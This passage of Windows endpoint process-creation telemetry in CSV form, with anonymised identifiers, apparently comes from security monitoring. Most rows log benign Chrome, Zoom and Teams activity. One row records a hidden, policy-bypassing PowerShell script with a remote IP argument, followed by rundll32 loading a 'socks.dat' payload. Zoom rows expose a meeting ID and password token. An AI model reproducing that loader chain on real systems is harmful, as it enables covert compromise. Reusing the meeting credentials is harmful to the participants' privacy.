19:30:00+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+151,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:01:01.746618400+00:00,13732,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:59:43.689127700+00:00,9244,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 152367491",False,2021-06-24 00:52:50.347644800+00:00,2140,\Device\HarddiskVolume3\Windows\System32\wscript.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:01:01.863234500+00:00,2021-06-24 01:02:01.848240400+00:00,03554f46-28f1-4393-b699-47e9943d9a51,computerpii_0a470890c60768167990033d701e7bd881398861,169828,False,10.7740.19041.1052,False,11540474045175383,,11540474045175422,2021-06-24 00:59:43.689127700+00:00,9244,2021-06-24 00:59:43.689127700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,9244,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,2049.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+152,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:49:22.583586+00:00,14240,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320853_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320853 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:49:22.686832300+00:00,2021-06-25 01:50:10.760712300+00:00,17f619cb-f629-49a7-a2ed-6c4a72c1fe8e,computerpii_0a470890c60768167990033d701e7bd881398861,184095,False,10.7740.19041.1052,False,11540474045144190,,11540474045178863,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+153,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:09.550256400+00:00,19272,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=236 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:10.515581800+00:00,2021-06-24 11:03:01.248754600+00:00,c9834793-aff1-4381-b315-b76ba0837a9f,computerpii_0a470890c60768167990033d701e7bd881398861,179661,False,10.7740.19041.1052,False,11540474045177854,,11540474045177947,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+154,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:14.951565700+00:00,21380,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:15.737299+00:00,2021-06-24 11:03:01.249147300+00:00,3a5e0995-9c01-4320-abec-4dc5777bd031,computerpii_0a470890c60768167990033d701e7bd881398861,179672,True,10.7740.19041.1052,False,11540474045177854,,11540474045177948,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+155,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:19.317436400+00:00,10916,Zoom.exe,"""Zoom.exe"" ""--url=zoommtg://us04web.zoom.us/join?action=join&confno=8311482309&pwd=ZUVwdmEvaUNrRkdMQm8rd0VEWFBNUT09&confid=dXRpZD1VVElEX2VkNDg2YjYzYWNmNzQ0ZDU5NGMwMzAwN2Q0MWI1NDFkJnVzcz1xamxRakx0SG9pZ1ZSVWpwQ0E2YUhUdWFwWjFaVmJUeURxTDVWeVJ5M3dMZnRGZUF2OWFoV3ZuRWFJQzh2cWxrbkhUc1pOUlBTZS16NXZhRUQzYmZ1WThNaXZoQ3I1UUVuTWsuLUEtZmtZZFZlLXVUTjFociZ0aWQ9MGNjMTczYzRhNDQ0NGMwMzg5YjBjMGI2MjVjMzZiYTc%3D&browser=chrome""",PortableExecutable,2021-05-31 03:58:56.891511300+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,265512,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:19.801174600+00:00,2021-06-24 11:03:01.249727800+00:00,dfc32ca4-4142-491e-9c68-359a434433cc,computerpii_0a470890c60768167990033d701e7bd881398861,179688,False,10.7740.19041.1052,False,11540474045177854,,11540474045177949,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,1.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings
+156,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:22.736330400+00:00,18272,Zoom.exe,"""Zoom.exe""  --action=join --runaszvideo=TRUE ",PortableExecutable,2021-05-31 03:58:56.891511300+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,265512,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 11:01:19.317436400+00:00,10916,Zoom.exe,"""Zoom.exe"" ""--url=zoommtg://us04web.zoom.us/join?action=join&confno=8311482309&pwd=ZUVwdmEvaUNrRkdMQm8rd0VEWFBNUT09&confid=dXRpZD1VVElEX2VkNDg2YjYzYWNmNzQ0ZDU5NGMwMzAwN2Q0MWI1NDFkJnVzcz1xamxRakx0SG9pZ1ZSVWpwQ0E2YUhUdWFwWjFaVmJUeURxTDVWeVJ5M3dMZnRGZUF2OWFoV3ZuRWFJQzh2cWxrbkhUc1pOUlBTZS16NXZhRUQzYmZ1WThNaXZoQ3I1UUVuTWsuLUEtZmtZZFZlLXVUTjFociZ0aWQ9MGNjMTczYzRhNDQ0NGMwMzg5YjBjMGI2MjVjMzZiYTc%3D&browser=chrome""",False,2021-06-24 10:59:28.981045+00:00,10072,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:22.781292100+00:00,2021-06-24 11:03:01.250962600+00:00,e5af8a7e-03c5-4285-8039-f5f6395107f6,computerpii_0a470890c60768167990033d701e7bd881398861,179722,False,10.7740.19041.1052,False,11540474045177949,,11540474045177951,2021-06-24 11:01:19.317436400+00:00,10916,2021-06-24 11:01:19.317436400+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,10916,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin,265512,2021-05-24 12:23:32+00:00,2021-05-31 03:58:55.590307100+00:00,2021-06-24 11:01:19.343238+00:00,2021-05-31 03:58:56.891511300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings
+157,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:40.317341300+00:00,6240,CptHost.exe,"-event 000012C8 -pid 18272 -evtname cpthost.exe18272-41-130E4FC8 -exitevent 00001290 -exitevtname cpthost.exe18272_rpcexit-41-130E4FC8 -user_path ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom""",PortableExecutable,2021-05-31 03:58:55.870674300+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\CptHost.exe,642856,56866774a299abb79709d8209d880ccd,89e0097996d1a3cf551250af8b635ec0d4e79e47db3d096d19412f1021a19425,3c5dfc3583d17e305aa21d19e37eca56d218a9a9,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 11:01:22.736330400+00:00,18272,Zoom.exe,"""Zoom.exe""  --action=join --runaszvideo=TRUE ",False,2021-06-24 11:01:19.317436400+00:00,10916,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:40.504222+00:00,2021-06-24 11:03:01.252911300+00:00,19ed1e0e-b6e8-4e48-a591-e801a68ff497,computerpii_0a470890c60768167990033d701e7bd881398861,179776,False,10.7740.19041.1052,False,11540474045177951,,11540474045177955,2021-06-24 11:01:22.736330400+00:00,18272,2021-06-24 11:01:22.736330400+00:00,Zoom.exe,18272,256,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin,265512,2021-05-24 12:23:32+00:00,2021-05-31 03:58:55.590307100+00:00,2021-06-24 11:01:19.343238+00:00,2021-05-31 03:58:56.891511300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,0.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings,"Zoom Video Communications, Inc.",Zoom Video Call,"5,6,6,961",CptHost.exe,CptHost.exe,Zoom Sharing Host
+158,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:45.064176100+00:00,15976,Zoom.exe,"""Zoom.exe""  --action=reconnect --runaszvideo=TRUE ",PortableExecutable,2021-05-31 03:58:56.891511300+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,265512,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 11:01:19.317436400+00:00,10916,Zoom.exe,"""Zoom.exe"" ""--url=zoommtg://us04web.zoom.us/join?action=join&confno=8311482309&pwd=ZUVwdmEvaUNrRkdMQm8rd0VEWFBNUT09&confid=dXRpZD1VVElEX2VkNDg2YjYzYWNmNzQ0ZDU5NGMwMzAwN2Q0MWI1NDFkJnVzcz1xamxRakx0SG9pZ1ZSVWpwQ0E2YUhUdWFwWjFaVmJUeURxTDVWeVJ5M3dMZnRGZUF2OWFoV3ZuRWFJQzh2cWxrbkhUc1pOUlBTZS16NXZhRUQzYmZ1WThNaXZoQ3I1UUVuTWsuLUEtZmtZZFZlLXVUTjFociZ0aWQ9MGNjMTczYzRhNDQ0NGMwMzg5YjBjMGI2MjVjMzZiYTc%3D&browser=chrome""",False,2021-06-24 10:59:28.981045+00:00,10072,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:01:45.109023300+00:00,2021-06-24 11:03:01.253693100+00:00,f574a743-cf95-4eaa-8846-96e2b2ff0b2d,computerpii_0a470890c60768167990033d701e7bd881398861,179798,False,10.7740.19041.1052,False,11540474045177949,,11540474045177956,2021-06-24 11:01:19.317436400+00:00,10916,2021-06-24 11:01:19.317436400+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,10916,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin,265512,2021-05-24 12:23:32+00:00,2021-05-31 03:58:55.590307100+00:00,2021-06-24 11:01:19.343238+00:00,2021-05-31 03:58:56.891511300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings
+159,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:01:45.384518600+00:00,15736,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADoAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=2720 /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 